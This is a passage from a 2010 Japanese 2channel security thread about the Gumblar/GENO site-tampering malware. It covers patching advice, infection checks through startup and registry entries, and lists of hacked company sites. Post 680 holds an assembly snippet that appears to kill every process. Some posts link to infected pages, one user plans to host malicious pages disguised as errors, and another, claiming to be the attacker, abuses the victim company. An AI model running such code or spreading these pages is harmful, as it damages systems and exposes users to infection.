2010/01/08(金) 13:31:12このゲストOS・・・プロダクトキー入れてる
盗まアッれるの・・・
0645名無しさん@お腹いっぱい。
2010/01/08(金) 13:33:10なにそれ
だめじゃん
0646名無しさん@お腹いっぱい。
2010/01/08(金) 13:34:22Firewallとかセキュリティーとかの各種設定をトロイに変更されたりするんだろ
通常使用は一般ユーザーで使用すればいいのに
7/Vistaなら、ログインしなおさなくても管理者権限が必要なときは管理者パスワードのダイヤログボックスが開いて
すぐ管理者作業できるから、常に一般ユーザーでログイン知れればいい
0647名無しさん@お腹いっぱい。
2010/01/08(金) 13:36:03マイクロソフトで使用期限3ヶ月くらいの体験版の仮想マシンVPC配ってるから、
その仮想マシン使えばいい
0648名無しさん@お腹いっぱい。
2010/01/08(金) 13:36:15流石Microsoft
0649sage ◆sage/xLnlI
2010/01/08(金) 13:37:32大丈夫がと思うよ
なにかあったときにはAVASTとノートン先生が守ってくれるからb
0650sage ◆sage/xLnlI
2010/01/08(金) 13:38:12なアッー!っなアッー!んだアッー!ってええええええええええええええええええええええええええええええええええええええええ
0651sage ◆sage/xLnlI
2010/01/08(金) 13:40:03アッー!と、一回M$のXPModeで、ひどい目にアッー!っアッー!から使いたくない
0652名無しさん@お腹いっぱい。
2010/01/08(金) 13:41:180653名無しさん@お腹いっぱい。
2010/01/08(金) 13:41:18明示的に表示されてないとfirewallスルーできないよね
できないといって><
0654sage ◆sage/xLnlI
2010/01/08(金) 13:42:12なアッー!んで?
0655名無しさん@お腹いっぱい。
2010/01/08(金) 13:42:510656名無しさん@お腹いっぱい。
2010/01/08(金) 13:43:520657sage ◆sage/xLnlI
2010/01/08(金) 13:44:290658名無しさん@お腹いっぱい。
2010/01/08(金) 13:44:590659名無しさん@お腹いっぱい。
2010/01/08(金) 13:45:51sage ◆sage/xLnlIのプロダクトキーは既に流出している
0660sage ◆sage/xLnlI
2010/01/08(金) 13:46:35えっ
どうゆうこと?
0661名無しさん@お腹いっぱい。
2010/01/08(金) 13:59:270662sage ◆sage/xLnlI
2010/01/08(金) 14:00:29うn
windows7の感染確認方法知ってす人いないよね?・?
0663名無しさん@お腹いっぱい。
2010/01/08(金) 14:02:03そもそもXPの時点では、まともにユーザーモードで動かないソフトが多すぎて...
0664名無しさん@お腹いっぱい。
2010/01/08(金) 14:04:28感染したらUbuntuにする。少なくとも嫁のPCは。
0665名無しさん@お腹いっぱい。
2010/01/08(金) 14:04:340666名無しさん@お腹いっぱい。
2010/01/08(金) 14:05:52上流のdebianにしろksg
0667名無しさん@お腹いっぱい。
2010/01/08(金) 14:06:08俺は遠慮するけど
0668名無しさん@お腹いっぱい。
2010/01/08(金) 14:10:35春のGENO祭りの時にはレジストリ内におかしなファイルが有るか無いかで判断してたが
0669名無しさん@お腹いっぱい。
2010/01/08(金) 14:12:000670名無しさん@お腹いっぱい。
2010/01/08(金) 14:12:47自分もそれが困る
たいしたソフトじゃないのになんで管理者権限じゃなきゃいけないんだろう
0672名無しさん@お腹いっぱい。
2010/01/08(金) 14:14:31これがMicrosoftクオリティーなのか・・・
0673名無しさん@お腹いっぱい。
2010/01/08(金) 14:26:03ウソの情報が飛び交ってるだけで、アンチウイルスソフト作ってる会社でも分からない
0674名無しさん@お腹いっぱい。
2010/01/08(金) 14:28:05嘘の情報ってww
検体があればリバースエンジニアリングで動作くらい分かるだろJK
0675名無しさん@お腹いっぱい。
2010/01/08(金) 14:32:49つ 別のユーザとして実行
これで動かないソフトのほとんどは動く。
0676名無しさん@お腹いっぱい。
2010/01/08(金) 14:32:530677名無しさん@お腹いっぱい。
2010/01/08(金) 14:33:42誰も使ってないようなOSにすればウイルスのターゲットにならないから、
できるだけマイナーなのにしとけ
NetBSDとかOpenBSDとか
0678名無しさん@お腹いっぱい。
2010/01/08(金) 14:33:58マジで?
全台クリーンインストールしろと言うのか
0679名無しさん@お腹いっぱい。
2010/01/08(金) 14:36:02新種のマルウェアに強いウイスルソフト使ってスキャンすればいいだろ
100%ではないが、だいたい確認できる
0680名無しさん@お腹いっぱい。
2010/01/08(金) 14:37:00dd 0x07,0x04,0x01
db "NetBSD",0x00,0x00
dd 200000000
section .data
section .text
global _start
_start:
xor eax, eax
push 0x09
mov eax, -1
push eax
xor eax,eax
mov al, 37
push eax
int 0x80
0681名無しさん@お腹いっぱい。
2010/01/08(金) 14:38:21マニュアル読め。
スタートアップガイドで普段は制限ユーザで使うようにと書いてあるわ。
0682名無しさん@お腹いっぱい。
2010/01/08(金) 14:39:01常に最新版に更新って言っても実際に更新かかるまでには微妙にタイムラグあるよな。
つまり、アップデートに気を使ってた場合でも、
最新版になる前にたまたま感染サイト踏んでたらアウトだよな。
0683名無しさん@お腹いっぱい。
2010/01/08(金) 14:39:28誰でも簡単に権限昇格できるWindowsなんて(ry
0684名無しさん@お腹いっぱい。
2010/01/08(金) 14:43:17大量にあったら、そんなめんどーなことは誰もやってくれないつぅこと
各アプリケーションもほとんどまともに対応してくれなかったしねぇ〜
Vistaが出てやっと対応したところのが多いじゃん
0685名無しさん@お腹いっぱい。
2010/01/08(金) 14:46:151 :おっおにぎりがほしいんだなφ ★:2010/01/06(水) 07:20:34 ID:???0
洋菓子メーカー「モロゾフ」(本社・神戸市)のインターネットサイトが
何者かに改ざんされる被害に遭っていたことが5日、わかった。
同社によるとサイトを閲覧したパソコンが新型コンピューターウイルス
「ガンブラー」に感染する恐れがあったが、被害の報告はなく、
サイトは改善済みという。
同社の説明では、改ざんされたのは4日午後7時半〜5日正午で、
感染や情報漏えいなどの連絡はない、としている。
↑
こういう「被害の報告は無く」ってのが一番怖いと思うんだが…
閲覧ユーザは感染に気づかず、ボット化してる可能性もあるって事だろ?
0686名無しさん@お腹いっぱい。
2010/01/08(金) 14:48:00だからそのときのために、わざわざMSがIEに保護モードつけたりしてくれてるんだろ
ちゃんと保護モードに対応したIEプラグイン類なら、プラグインに脆弱性があってマルウェアにやられても、
やられる範囲を制限できる
0687名無しさん@お腹いっぱい。
2010/01/08(金) 14:50:26http://tsushima.2ch.net/test/read.cgi/news/1262929220/
0688名無しさん@お腹いっぱい。
2010/01/08(金) 14:51:250689名無しさん@お腹いっぱい。
2010/01/08(金) 14:53:07IEの保護モード機能ってサイト閲覧時のファイル保存先を限定してるだけじゃないの?
Adobeの脆弱性を突いた攻撃と何の関係があるの?
0690名無しさん@お腹いっぱい。
2010/01/08(金) 14:54:51今一番有力な方法を教えてくださひ。
0691名無しさん@お腹いっぱい。
2010/01/08(金) 14:56:19お前らモロゾフのHP見てみろw
http://mimizun.com/log/2ch/news4vip/1262612925/
1 :以下、名無しにかわりましてVIPがお送りします:2010/01/04(月) 22:48:45.86 ID:kMgcW7bI0
ttp://www.morozoff.co.jp/
なんだこれw
5 :以下、名無しにかわりましてVIPがお送りします:2010/01/04(月) 22:53:02.74 ID:+8J8P32m0
Javaのコンソールが起動してPCがすげー重くなった
なんか仕込まれてるの?
7 :以下、名無しにかわりましてVIPがお送りします:2010/01/04(月) 23:00:03.62 ID:euSlf2pA0
>>1
死ね
重いいいいいいいいいい
0692名無しさん@お腹いっぱい。
2010/01/08(金) 14:56:45改ざんされたら感染してる
0693名無しさん@お腹いっぱい。
2010/01/08(金) 14:59:14processmoniterでその時の挙動を調べてみたが、何も起こらない・・・
0694名無しさん@お腹いっぱい。
2010/01/08(金) 15:01:03動作させることに一番の意味があるんだよ
保護モード非対応のプラグイン類を動作させるときはデフォルトで警告が出るし、
警告がでない保護モード対応プラグインなら、脆弱性でやられてもまず影響が出ない
保護モード下で動いてるIEやプラグインに脆弱性があってやられても、
システムのほとんどの場所に書き込めない
このあたり呼んでみれば?
http://msdn.microsoft.com/ja-jp/library/bb250462(VS.85).aspx
0695名無しさん@お腹いっぱい。
2010/01/08(金) 15:03:37適当なHTML作って、FTPでどこか上げたときに
書き換わってるかをチェックする感じでしょうか?
社員のPCをチェックしたいんですがなにかいい
方法はないかなァと思いまして。。。
0696名無しさん@お腹いっぱい。
2010/01/08(金) 15:03:51CodeProject: A Developer's Survival Guide to IE Protected Mode. Free source code and programming help
ttp://www.codeproject.com/KB/vista-security/PMSurvivalGuide.aspx
0697名無しさん@お腹いっぱい。
2010/01/08(金) 15:16:11そりゃあ、今踏んだって何も起こらなくて当然。
0698名無しさん@お腹いっぱい。
2010/01/08(金) 15:21:480699名無しさん@お腹いっぱい。
2010/01/08(金) 15:22:402ちゃんを見習え
0700名無しさん@お腹いっぱい。
2010/01/08(金) 15:28:22>>99
99 :名無しさん@お腹いっぱい。:2009/12/28(月) 08:37:05
何か役に立つかもしれないので報告
fxwill●comにウイルスがあると聞き試しに見てみた(←阿呆)
/*GNU GPL*/〜というコードが埋め込まれてたっぽい
↓
サイトを開くと
このファイルの実行を許可しますか?というウインドウが出てきて(VISTA)
「キャンセル」を押しても再度同じウインドウが表示
何度押しても同じでそのうち画面が固まる
↓
(以下略)
これってつまり、IE保護モードで今回のリスクは回避されないんじゃね?
0701名無しさん@お腹いっぱい。
2010/01/08(金) 15:30:21Flashの脆弱性を狙うコードが保護モード回避したとかの話は聞いたこと無い
テストコードは出ても、実際にそれを使ったマルウェア等は出てない
0702名無しさん@お腹いっぱい。
2010/01/08(金) 15:30:290703名無しさん@お腹いっぱい。
2010/01/08(金) 15:34:25そこ見ても、保護モードのシステムの管理下で動作するだけで、
勝手にシステムとかに書き込めるわけじゃないじゃん
0704名無しさん@お腹いっぱい。
2010/01/08(金) 15:42:33>Adobe Readerの脆弱性攻撃は、「ChangeLog.pdf」というPDFファイルの中に
>複数の攻撃コードが組み込まれており、パソコンにAdobe Readerがインストールされている場合には、
>この細工されたPDFファイルを自動的に開いて攻撃を行う。
↑保護モードでは通過してしまうプロセスを悪用してるんじゃないのかと
0705名無しさん@お腹いっぱい。
2010/01/08(金) 16:02:33そういえばJavaがウイルスのローダーとして悪用されていた件
脆弱性以前の問題だよね・・・
0706名無しさん@お腹いっぱい。
2010/01/08(金) 16:22:120707名無しさん@お腹いっぱい。
2010/01/08(金) 16:24:380708名無しさん@お腹いっぱい。
2010/01/08(金) 16:28:590709名無しさん@お腹いっぱい。
2010/01/08(金) 16:33:53NO
Adobeがちゃんと脆弱性塞いでれば良いだけの話
もっと言えばMSが情報公開して協力してれば良いだけの話
攻撃自体は単純
0710名無しさん@お腹いっぱい。
2010/01/08(金) 16:35:30どこまでできるのかわからんけど
0711名無しさん@お腹いっぱい。
2010/01/08(金) 16:37:16>MSが情報公開して協力
誰に?
0712名無しさん@お腹いっぱい。
2010/01/08(金) 16:38:20Adobeに
0713名無しさん@お腹いっぱい。
2010/01/08(金) 16:46:25WindowsとFlashは最新
ばっちこいや
0714名無しさん@お腹いっぱい。
2010/01/08(金) 16:51:55最終ステップ:Windowsもアンインストール
0715名無しさん@お腹いっぱい。
2010/01/08(金) 16:54:29ttp://www.jpcert.or.jp/pr/2010/pr100001.txt
0716名無しさん@お腹いっぱい。
2010/01/08(金) 17:09:010717名無しさん@お腹いっぱい。
2010/01/08(金) 17:21:20感染する場所がありゃしないぜ!
0718名無しさん@お腹いっぱい。
2010/01/08(金) 17:22:160719名無しさん@お腹いっぱい。
2010/01/08(金) 17:34:420720名無しさん@お腹いっぱい。
2010/01/08(金) 17:38:33普段から使ってるもの一通り最新版にしておけばGumblarに限らず
大体のウイルスにかからないもんなの?
0721名無しさん@お腹いっぱい。
2010/01/08(金) 17:42:15慌てて途中でブラウザを閉じたのですが感染してるか心配です。
こちらの(http://www29.atwiki.jp/geno/)GENOウイルスまとめサイトに書かれていた方法を確認し
感染の可能性は低いと判断しましたが、このサイトの情報は古いと書いてあったので
本当に無事なのかちょっと心配です。
上記サイトに書かれている方法以外に感染を判断する方法はありますか?
0722名無しさん@お腹いっぱい。
2010/01/08(金) 17:46:26古いバージョンの脆弱性を狙うタイプのウイルスは防げるかと思われ
それ以外にも例えばAdobeReaderのjsOFFみたいな機能設定に関する脆弱性とか、
そもそも実行型ファイルを開いて感染する場合もあると思うけども
0723名無しさん@お腹いっぱい。
2010/01/08(金) 17:47:13一通り最新版にして適切な設定にしていれば助かる可能性は高くなる
なんでもかんでも自動実行されるPCだとGumblarに限らず危険って事
0724名無しさん@お腹いっぱい。
2010/01/08(金) 17:49:41Adobeの対応悪すぎだよな。
過去のMicrosoftと同じ過ちを繰り返してる。
みんな歴史に学べないねぇ。
0725名無しさん@お腹いっぱい。
2010/01/08(金) 17:51:14新型はふせげねー、新型にあたったらクリーンインストールするしかない
0726名無しさん@お腹いっぱい。
2010/01/08(金) 17:51:38ttp://internet.watch.impress.co.jp/docs/news/20100108_341267.html
0727名無しさん@お腹いっぱい。
2010/01/08(金) 17:53:01対応遅すぎ。
0728名無しさん@お腹いっぱい。
2010/01/08(金) 17:54:32自分とこの製品が犯罪に利用されてるってのに
0729名無しさん@お腹いっぱい。
2010/01/08(金) 17:56:43常に最新版に更新って言っても実際に更新かかるまでには微妙にタイムラグあるよな。
つまり、アップデートに気を使ってた場合でも、
最新版になる前にたまたま感染サイト踏んでたらアウトだよな。
0730名無しさん@お腹いっぱい。
2010/01/08(金) 17:57:040731名無しさん@お腹いっぱい。
2010/01/08(金) 17:59:09感染しているPCはCPU使用率が異常に高いのも目安のひとつだな
0732名無しさん@お腹いっぱい。
2010/01/08(金) 17:59:23ttp://www.so-net.ne.jp/security/news/view.cgi?type=2&no=2113
三栄コーポレーション
サイバーエージェント
ハウス食品
東京財団
データリンクス
京王電鉄
ビロング
恵那バッテリー電装
ナショナルクリエイターズカンファレンス
大学図書館問題研究会
モロゾフ
民主党東京都総支部連合会
ローソン
検索エンジンMooter
デジタルマガジン
ディズニー
信越放送
FX為替情報検索「fxwill.com」
野村ビルマネジメント
京成トラベルサービス
本田技研工業
JR東日本
ラジオ関西
しかし、とんでもねー数だな…
0733名無しさん@お腹いっぱい。
2010/01/08(金) 18:02:140734名無しさん@お腹いっぱい。
2010/01/08(金) 18:02:32http://www.yomiuri.co.jp/net/security/goshinjyutsu/20100108-OYT8T00898.htm?from=navlk
0735名無しさん@お腹いっぱい。
2010/01/08(金) 18:02:43http://www.virustotal.com/jp/analisis/9e032adbec239b778cd4e14405953799185c6c7f1f35fe90531c944efc2f0787-1262939972
対応済み:Avira カスペ NOD32
0736名無しさん@お腹いっぱい。
2010/01/08(金) 18:02:49VRT: Adobe Reader media.newPlayer() Analysis (CVE-2009-4324)
ttp://vrt-sourcefire.blogspot.com/2009/12/adobe-reader-medianewplayer-analysis.html
extraexploit: Adobe CVE-2009-4324 in the wild - (0day) - part 0-6
ttp://extraexploit.blogspot.com/search?q=CVE-2009-4324
0737名無しさん@お腹いっぱい。
2010/01/08(金) 18:04:25ここらのサイトやアメブロなんかで気づかずに感染してる一般人って相当数いるんじゃね?
今回のは自分が感染してるかどうか分からないみたいだし…
0738名無しさん@お腹いっぱい。
2010/01/08(金) 18:05:29ネズミーもか!?
閲覧者多そうだしますますやばいな
0739名無しさん@お腹いっぱい。
2010/01/08(金) 18:09:37一応他スレから転載
437 :8080:2010/01/08(金) 18:03:07 ID:Db0zlWvOO
>>435
旧Gumblarのやつは使えない。
【感染確認方法】
msconfigでスタートアップにsiszyd32.exeとTMD.tmpがあったらご愁傷様(感染確定)
削除はネットワークから切り離して、セーフモードで起動させ
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"sysgif32"="C:\\WINDOWS\\TEMP\\~TMD.tmp"
削除
※sysgif32で検索
↓
C:\Documents and Settings\ユーザー名\スタート メニュー\プログラム\siszyd32.exe
ファイルを削除
*感染していた場合*
駆除するより、バックアップを取ってから
リカバリ(クリーンインストール)を強く推奨。
0740名無しさん@お腹いっぱい。
2010/01/08(金) 18:09:37ディズニー見ちゃったよ
いつの時点で改ざんされてたんだろう
0741名無しさん@お腹いっぱい。
2010/01/08(金) 18:10:19リンク先読めばわかるけど、大体の企業は
「特定のページがやられてて、それ以外は今のところ異常ない」って建前らしい。
まあ、ウイルスの全貌が解析されきってない以上
実際のところはどうだかわかったもんじゃないけどね。
0742名無しさん@お腹いっぱい。
2010/01/08(金) 18:11:01リンク先に詳しく書いてある。
0743名無しさん@お腹いっぱい。
2010/01/08(金) 18:14:29Forbiddenってなる
0744名無しさん@お腹いっぱい。
2010/01/08(金) 18:15:51>■検索エンジンMooter(2009年12月30日発表)
>種別:/*GNU GPL*/
>期間:2009年12月25日1時〜12月28日18時30分
>場所:Mooterホームページ(*.mooter.co.jp)、および「Mooter検索窓」の設置サイト
>告知:弊社ホームページの改ざんについてのお詫びとお知らせ(削除済み)
こことか地味に酷くね?
検索窓設置してるサイトもやられてるとしたら、どこまで広がってるか…
しかも告知「削除済み」とか対応がありえねえだろ。
0745名無しさん@お腹いっぱい。
2010/01/08(金) 18:15:55は?
0746名無しさん@お腹いっぱい。
2010/01/08(金) 18:16:52種別:Gumblar.x
期間2009年12月22日16時〜12月25日18時
場所:ショッピングサイト お正月特集ページ(www.disney.co.jp/shopping/special/0912_newyear.html)
告知:お正月特集ページに関するお詫び
http://www.disney.co.jp/shopping/pop/091229_info.html
しょうがないやつだ。念のためおまえのPCはクリーンインストールして来い
0747名無しさん@お腹いっぱい。
2010/01/08(金) 18:17:40>■ディズニー(2009年12月29日発表)
>種別:Gumblar.x
>期間2009年12月22日16時〜12月25日18時
>場所:ショッピングサイト お正月特集ページ(www.disney.co.jp●shopping/special/0912_newyear.html)
>告知:お正月特集ページに関するお詫び
>www.disney.co.jp●shopping/pop/091229_info.html
0748名無しさん@お腹いっぱい。
2010/01/08(金) 18:18:27■ディズニー(2009年12月29日発表)
種別:Gumblar.x
期間2009年12月22日16時〜12月25日18時
場所:ショッピングサイト お正月特集ページ(www.disney.co.jp/shopping/special/0912_newyear.html)
告知:お正月特集ページに関するお詫び
ttp://www.disney.co.jp/shopping/pop/091229_info.html
0749名無しさん@お腹いっぱい。
2010/01/08(金) 18:19:16>>592 を再スキャンしてみた
定義データでは一部のスクリプトだけの検出だな・・・
本格的な対応はこれからか
結果: 0/41
ttp://www.virustotal.com/jp/analisis/b51322f52d9926c76479aaadecf5d9a037f2361387e811911b7f83c6a32bc3c8-1262941360
結果: 0/41
ttp://www.virustotal.com/jp/analisis/232d5aa747718a48e4471bdee5a35fd136be15087e7faf69f17a7619dfa8d209-1262941441
結果: 1/41 (Sophos)
ttp://www.virustotal.com/jp/analisis/aca66f8d123896d30b71158c6fa451121939d5b5adccdd15c9f7b183fd80b430-1262941513
0750名無しさん@お腹いっぱい。
2010/01/08(金) 18:20:54(1)Microsoft Update(Windows Update)を実行しシステムを最新の状態にする
(2)Adobe Readerを最新版に更新する
(3) Adobe ReaderのAcrobat JavaScriptを無効に設定
(4) JRE(Java Runtime Environment)を最新版に更新する
(5) Flash Playerを最新版に更新する
(6) QuickTimeを最新版に更新する
の対策が取れてたら感染サイト踏んでたとしても大丈夫なはずだが一応
0751名無しさん@お腹いっぱい。
2010/01/08(金) 18:21:11わざわざすいません
該当する期間とショッピングサイトには行っていないから
なんとかセフセフ
0752名無しさん@お腹いっぱい。
2010/01/08(金) 18:23:48748 名前:名無しさん@お腹いっぱい。[sage] 投稿日:2010/01/08(金) 18:18:27
>>743
■ディズニー(2009年12月29日発表)
種別:Gumblar.x
期間2009年12月22日16時〜12月25日18時
場所:ショッピングサイト お正月特集ページ(www.disney.co.jp/shopping/special/0912_newyear.html)
告知:お正月特集ページに関するお詫び
ttp://www.disney.co.jp/shopping/pop/091229_info.html
0753名無しさん@お腹いっぱい。
2010/01/08(金) 18:24:12http://pc11.2ch.net/test/read.cgi/sec/1259607683/405
今北さん用、GENO(Gumblar)ウイルス対処法。
行っておくべき事項を箇条書きにしました。
細かなことは他にもいろいろありますが、とりあえず以下を実施して下さい。
(1)Microsoft Update(Windows Update)を実行しシステムを最新の状態にする
(2)Adobe Readerを最新版に更新する
(3) Adobe ReaderのAcrobat JavaScriptを無効に設定
(4) JRE(Java Runtime Environment)を最新版に更新する
(5) Flash Playerを最新版に更新する
(6) QuickTimeを最新版に更新する
(1)〜(4)を行っていれば、現時点で改ざんサイトを閲覧してもウイルスには感染しない。
攻撃コードは変化する可能性もあるので、念のため全て行っていただきたい。
Adobe Readerなどのアップデート方法については下記のトピックスを参照のこと。
Acrobat JavaScriptを無効にする方法は以下の通り。
(1)Adobe Readerを起動し[編集]メニューの[環境設定]を選択
(2)「分類」の中の「JavaScript」を選択
(3)「Acrobat JavaScriptを使用」のチェックをクリア
(4)「OK」ボタンを押す
0754名無しさん@お腹いっぱい。
2010/01/08(金) 18:25:05win.jpgなどの脆弱性を突いた攻撃自体を検出した方が効率的だろ
脆弱性攻撃を受けた後実行されるpdfupf.exeだけを検出すものもあるがこれでも防御は可能
0755名無しさん@お腹いっぱい。
2010/01/08(金) 18:26:280756名無しさん@お腹いっぱい。
2010/01/08(金) 18:27:450757名無しさん@お腹いっぱい。
2010/01/08(金) 18:28:110758名無しさん@お腹いっぱい。
2010/01/08(金) 18:30:20"sysgif32"="C:\\WINDOWS\\TEMP\\~TMD.tmp"
の部分は新しいやつで
"~TM6.tmp"="C:\\WINDOWS\\TEMP\\~TM6.tmp"
に変わってる
しかし同じような名前なのですぐ気づく
これからも変わるかも知れないが変な物が登録されているかはすぐ分かるだろう
0759名無しさん@お腹いっぱい。
2010/01/08(金) 18:34:06詳しくありがとうございます
0760752
2010/01/08(金) 18:37:490761名無しさん@お腹いっぱい。
2010/01/08(金) 18:40:31感染サイトのソース見ようとしたらavast!がプゥプゥいった。
この状況でも感染するもの?
adobeのjavaはオフにしてある。
0762名無しさん@お腹いっぱい。
2010/01/08(金) 18:40:400763名無しさん@お腹いっぱい。
2010/01/08(金) 18:42:29その場合はNoScriptでブロックされているはず
問題ない
>adobeのjavaはオフにしてある。
Tips:JavaとJavaScriptは別物
0764名無しさん@お腹いっぱい。
2010/01/08(金) 18:48:29違うのね
0765名無しさん@お腹いっぱい。
2010/01/08(金) 18:49:050766名無しさん@お腹いっぱい。
2010/01/08(金) 18:49:370767名無しさん@お腹いっぱい。
2010/01/08(金) 18:52:52感染はしないけど
0768名無しさん@お腹いっぱい。
2010/01/08(金) 18:52:58ていうかview-source:ってリンク先のサイト踏まずに
ソースがみれるものだと思ってたんだがウイルスは防げないのか…
オンラインソースチェッカー閉鎖が惜しまれる
0769名無しさん@お腹いっぱい。
2010/01/08(金) 18:54:52http://www.aguse.jp/
じゃだめなのか?
0770名無しさん@お腹いっぱい。
2010/01/08(金) 18:55:57見れると思うけど
>>550
ttp://www.aguse.jp/
0771名無しさん@お腹いっぱい。
2010/01/08(金) 18:57:21IEでセキュリティ高にしたり、firefox+NoScript使えばさらに安全になるのかな?
0772名無しさん@お腹いっぱい。
2010/01/08(金) 18:57:43モロゾフの人がFTPログを証拠として被害届けを出したそうですね
でもあれは不正アクセスの証明にしかなりませんね
モロゾフの人健忘症なのでしょうかね
自身が加害者であることは伝えてあるのですが
対応が駄目駄目です
>モロゾフの人
首吊って氏んだ方がいいとおもいますよ
0773名無しさん@お腹いっぱい。
2010/01/08(金) 18:58:48ってソースどこに表示されるの?
ホストだとかドメインだとかは出てくるんだけど
0774772EM114-48-42-165.pool.e-mobile.ne.jp
2010/01/08(金) 19:01:01文句があったらかかってきなさい
-o_japan-オルティスジャパンー
0775名無しさん@お腹いっぱい。
2010/01/08(金) 19:02:20調べたいサイトのURLを入力してクリック
結果のページ右のスクリーンショット(クリックすると拡大します)これで見られます
0776名無しさん@お腹いっぱい。
2010/01/08(金) 19:02:22http://kakiko.com/check/sample.html
0777名無しさん@お腹いっぱい。
2010/01/08(金) 19:03:23Adobe Reader、JRE、QuickTimeとか大して使わないものはアンインストール
Adobe Readerなんて他の無料で軽いの使えばいいんだし
これが一番の防御策だね
0778名無しさん@お腹いっぱい。
2010/01/08(金) 19:03:30ゴメンこれはサイトを見たいときね
0779sage ◆sage/xLnlI
2010/01/08(金) 19:09:32検体(コードが書いてあるやつ)いるならあげる
うpできるかわからないけど
0780名無しさん@お腹いっぱい。
2010/01/08(金) 19:09:48これ知らなかった
ありがとう
0781名無しさん@お腹いっぱい。
2010/01/08(金) 19:12:390782名無しさん@お腹いっぱい。
2010/01/08(金) 19:17:18ここはまだだね
いつの間にかLGPLに変わってるし
0783名無しさん@お腹いっぱい。
2010/01/08(金) 19:18:42なんで馬鹿みたいにネズミーとか言うんだろ
長くてみんどくさいならTDLとかでいいじゃん
何かスゲーむかついたので
>ネズミー
0784名無しさん@お腹いっぱい。
2010/01/08(金) 19:19:11どういう人かと思って検索したら驚いた
0785名無しさん@お腹いっぱい。
2010/01/08(金) 19:20:42いちいち言わなくて良いよ
0786名無しさん@お腹いっぱい。
2010/01/08(金) 19:21:01LGPLだね
元がどうだったか知らないけど
0787名無しさん@お腹いっぱい。
2010/01/08(金) 19:37:29ttp://www.scriptbrowserk.com/
コンテンツブロックに*:8080/*を放り込m(ry
0788名無しさん@お腹いっぱい。
2010/01/08(金) 19:45:43お馴染みのヌーを萌擬人化したキャラ
誰か・・・描いて・・・
0789名無しさん@お腹いっぱい。
2010/01/08(金) 19:50:47右上のスクリーンショットの下からいけるGatewayへ。
上のフレームにある「ソース表示」でソースを持ってこれる。
だから、最初からGatewayに行ったらいいんじゃないかな。
ttp://gw.aguse.jp/
逆に、ここからaguseに行くことも可能(フレームの「ウェブ調査」)。
0790名無しさん@お腹いっぱい。
2010/01/08(金) 20:12:15>>739の方法で調べて
スタートアップにsiszyd32.exeとTMD.tmpの両方なかったら
この手のウイルスには感染していないでFA?
感染してないと思うけど気になるので
0791名無しさん@お腹いっぱい。
2010/01/08(金) 20:13:10対策していない企業とかマジでありえない
対策していないネットユーザにも責任はあるが
そのままWEBサイトを放置している企業の責任は重大
0792名無しさん@お腹いっぱい。
2010/01/08(金) 20:19:08ノートンは脆弱性保護で最初から対応してる
今はファイルも検出する
0793名無しさん@お腹いっぱい。
2010/01/08(金) 20:21:30こちらがまだだったのでVPCで踏んでみた。
特に何も起こらない・・・
フラッシュのバージョンが10.0.42.34だと影響ないということ?
0794名無しさん@お腹いっぱい。
2010/01/08(金) 20:22:27ありがとう、少し安心した
0795名無しさん@お腹いっぱい。
2010/01/08(金) 20:23:21Flashは関係ない
0796名無しさん@お腹いっぱい。
2010/01/08(金) 20:24:43感染が気になるならスタートアップ確認でOK
さらに言えばタスクマネージャーで確認
0797790
2010/01/08(金) 20:31:54タスクマネージャーにもmsconfigで見たスタートアップにも
siszyd32.exeとTMD.tmpは影も形もなかったよ、よかった
みんな教えてくれてありがとう
早い話
オンラインスキャン汁
0799名無しさん@お腹いっぱい。
2010/01/08(金) 20:37:350800名無しさん@お腹いっぱい。
2010/01/08(金) 20:41:04オワタ\(^o^)/
今でも(´・ω・) スクリプトが埋め込まれているうrlplz
0801名無しさん@お腹いっぱい。
2010/01/08(金) 20:51:06アホな質問しているのかしら…。
0802名無しさん@お腹いっぱい。
2010/01/08(金) 21:02:06TDLのガイドライン・・・
0803sage ◆sage/xLnlI
2010/01/08(金) 21:08:21おk
うpしてくる(自分のサイトに)
0804名無しさん@お腹いっぱい。
2010/01/08(金) 21:13:00お前はさっきから何がしたいんだ?
0805sage ◆sage/xLnlI
2010/01/08(金) 21:13:40検体的なもの(アクセスすると危険)
0806名無しさん@お腹いっぱい。
2010/01/08(金) 21:18:10エラーにみせかけるとな?
鬼畜ですな
0807名無しさん@お腹いっぱい。
2010/01/08(金) 21:27:28/*GNU GPL*/
0808名無しさん@お腹いっぱい。
2010/01/08(金) 21:33:55カスペルスキー無反応
win7
firefox カスペルスキー仮想実行モード
0809ZK000167.ppp.dion.ne.jp sage ◆sage/xLnlI
2010/01/08(金) 21:41:15それやばい
0810ZK000167.ppp.dion.ne.jp sage ◆sage/xLnlI
2010/01/08(金) 21:43:09エラー画面をみて思いつきましたw
0811名無しさん@お腹いっぱい。
2010/01/08(金) 21:45:22ttp://www.okamoto.co.jp/
KIS2010で検出。
0812名無しさん@お腹いっぱい。
2010/01/08(金) 21:47:22アンチウイルスソフトをインスコするたびにBSOD祭りの俺はどうすれば・・・
0813名無しさん@お腹いっぱい。
2010/01/08(金) 21:51:26Kaspersky
Internet Security 2010
アクセスが禁止されました
要求されたURLのWebページを表示できません
URL:
>>811
このWebページはウイルスに感染しています
次のウイルスが見つかりました: Trojan-Downloader.JS.Agent.ewo
情報:
21:50:29
Kaspersky Internet Security 2010
0814ZK000167.ppp.dion.ne.jp sage ◆sage/xLnlI
2010/01/08(金) 21:52:22なにそれこわい
明日は京都は違う検体をupします
種類も変えます(明日も鬼畜なやつにしようwwwwwwフヒッwwwwwww)
upの仕方
コードを書いてtxtに
↓
up
↓
txtをhtmlに書き換え
ヽ('A`)ノ 完成!
( )
ノω|
0815名無しさん@お腹いっぱい。
2010/01/08(金) 21:53:47http://www.trendflexsecurity.jp/housecall/index.html?WT.ac=JPclusty_onlinescan
http://security.symantec.com/sscv6/default.asp?productid=symhome&langid=jp&venid=sym
0816ZK000167.ppp.dion.ne.jp sage ◆sage/xLnlI
2010/01/08(金) 21:54:29なにも起こらない 当たり前だけど
(pspで2ch北から)
0817ZK000167.ppp.dion.ne.jp sage ◆sage/xLnlI
2010/01/08(金) 21:56:130818名無しさん@お腹いっぱい。
2010/01/08(金) 21:57:26最近のウイルスはホストOSまで影響を与えるらしいよ(そよっ
0819名無しさん@お腹いっぱい。
2010/01/08(金) 21:58:570820名無しさん@お腹いっぱい。
2010/01/08(金) 22:07:53こういうのは2chブラウザビューアで見ても感染しない?
0821名無しさん@お腹いっぱい。
2010/01/08(金) 22:09:11winマシンで見る限り絶対安心とは言えない
0822名無しさん@お腹いっぱい。
2010/01/08(金) 22:10:08押入れから古いPC(HDD無)引っ張り出して
KNOPPIX(DVD)+USBメモリマウント
